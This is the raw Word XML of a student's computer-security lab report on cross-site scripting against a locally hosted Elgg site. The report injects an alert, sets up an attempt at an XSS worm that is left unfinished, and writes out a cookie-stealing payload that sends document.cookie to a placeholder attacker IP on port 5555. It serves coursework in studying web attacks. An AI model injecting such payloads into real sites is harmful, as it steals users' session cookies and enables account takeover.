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2C9A" w:rsidRDefault="00407EBC">
      <w:r>
        <w:t>Talal Jawaid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00407EBC" w:rsidRDefault="00407EBC">
      <w:r>
        <w:t>12/6/2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00407EBC" w:rsidRDefault="00407EBC">
      <w:r>
        <w:t>CSC 154</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00407EBC" w:rsidRDefault="00407EBC">
      <w:r>
        <w:t>Lab 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00407EBC" w:rsidRDefault="00407EBC">
      <w:r>
        <w:t>Professor Jun Dai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00407EBC" w:rsidRDefault="00407EBC"/>
    <w:p w:rsidR="00407EBC" w:rsidRDefault="00407EBC"/>
    <w:p w:rsidR="00407EBC" w:rsidRDefault="00407EBC"/>
    <w:p w:rsidR="00407EBC" w:rsidRDefault="00407EBC"/>
    <w:p w:rsidR="00407EBC" w:rsidRDefault="00407EBC"/>
    <w:p w:rsidR="00407EBC" w:rsidRDefault="00407EBC" w:rsidP="00407EBC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we must ensure that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, apache, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Elgg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are installed. We understand that the first two are installed from previous labs. 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r>
        <w:t>Start apache server using “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service apache2 start”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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Elgg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> application has been prebuilt in this lab and is hosted locally even though the URL seems to point to the internet. Hosts file has been modified to allow this. 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r w:rsidRPr="00407EBC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="612839EB" wp14:editId="6D192BC8">
            <wp:extent cx="5943600" cy="36214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C" w:rsidRDefault="00407EBC" w:rsidP="00407EBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We want to embed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code that will open alert modal in our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Elgg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> profile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r w:rsidRPr="00407EBC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C937E4F" wp14:editId="2343FB59">
            <wp:extent cx="5753100" cy="33401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EBC" w:rsidRPr="00407EBC" w:rsidRDefault="00407EBC" w:rsidP="00407EBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:right="-7810"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00407EBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00407EBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00407EBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>(’&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00407EBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00407EBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00407EBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00407EBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>=http://attacker_IP_address:5555?c=’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00407EBC" w:rsidRPr="00407EBC" w:rsidRDefault="00407EBC" w:rsidP="00407EBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:right="-7810"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00407EBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>+ escape(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00407EBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00407EBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>) + ’   &gt;’);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00407EBC" w:rsidRPr="00407EBC" w:rsidRDefault="00407EBC" w:rsidP="00407EBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:right="-7810"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00407EBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>&lt;/script&gt;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r>
        <w:t xml:space="preserve">The above </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code will run calling an image from an attacker’s IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00407EBC" w:rsidRDefault="00407EBC" w:rsidP="00407EBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LiveHTTPHeaders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> extension </w:t>
      </w:r>
      <w:r w:rsidR="000E7C17">
        <w:t>will allow us to see HTTP request messages from the browser. It seems to function the save as Chromium Dev tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E7C17" w:rsidRDefault="000E7C17" w:rsidP="00407EBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7C17">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C7A4BB8" wp14:editId="7DBBE9DF">
            <wp:extent cx="5880100" cy="279400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E7C17" w:rsidRDefault="000E7C17" w:rsidP="00407EBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The goal is to inspect the HTTP request made and craft a java program to create a similar request that would seem like it was made legitimately. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E7C17" w:rsidRDefault="000E7C17" w:rsidP="00407EBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E7C17" w:rsidRDefault="000E7C17" w:rsidP="00407EBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7C17">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03DD2DDF" wp14:editId="05010EA0">
            <wp:extent cx="5943600" cy="6507480"/>
            <wp:effectExtent l="0" t="0" r="0" b="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17" w:rsidRDefault="000E7C17" w:rsidP="00407EBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7C17">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69056A95" wp14:editId="07E9FA1F">
            <wp:extent cx="5943600" cy="4621530"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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17" w:rsidRDefault="000E7C17" w:rsidP="00407EBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We want to write </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> XSS worm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E7C17" w:rsidRDefault="000E7C17" w:rsidP="000E7C17">
      <w:r>
        <w:t xml:space="preserve">However, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code provided is incomplete and the Ajax code provided seems to not run. It seems based off documentation that some functions have been deprecated and are no longer functional. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E7C17" w:rsidRDefault="000E7C17" w:rsidP="000E7C17"/>
    <w:p w:rsidR="000E7C17" w:rsidRDefault="000E7C17" w:rsidP="000E7C17">
      <w:r>
        <w:t xml:space="preserve">Based off my understanding of the lab and work experience, I attempted to write Typescript code that followed the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>skeleton, but</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was unable to understand how to write a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>self propagating</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> worm. I tried to use the provided resources but some of the links were dead. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E7C17" w:rsidRDefault="000E7C17" w:rsidP="000E7C17">
      <w:r w:rsidRPr="000E7C17">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="668A4E51" wp14:editId="164785C7">
            <wp:extent cx="5943600" cy="4034790"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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C17" w:rsidRDefault="000E7C17" w:rsidP="000E7C17"/>
    <w:sectPr w:rsidR="000E7C17" w:rsidSect="000419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00AFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37ECA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EBC"/>
    <w:rsid w:val="000419DE"/>
    <w:rsid w:val="000E7C17"/>
    <w:rsid w:val="00407EBC"/>
    <w:rsid w:val="00DF2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933443"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0D919262-8D64-D447-A624-572FDE67A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E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9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17325">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="-78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71330">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="-78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4975">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="-78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221</Words>
  <Characters>1262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Talal Jawaid</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Talal Jawaid</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-07T07:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-07T07:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>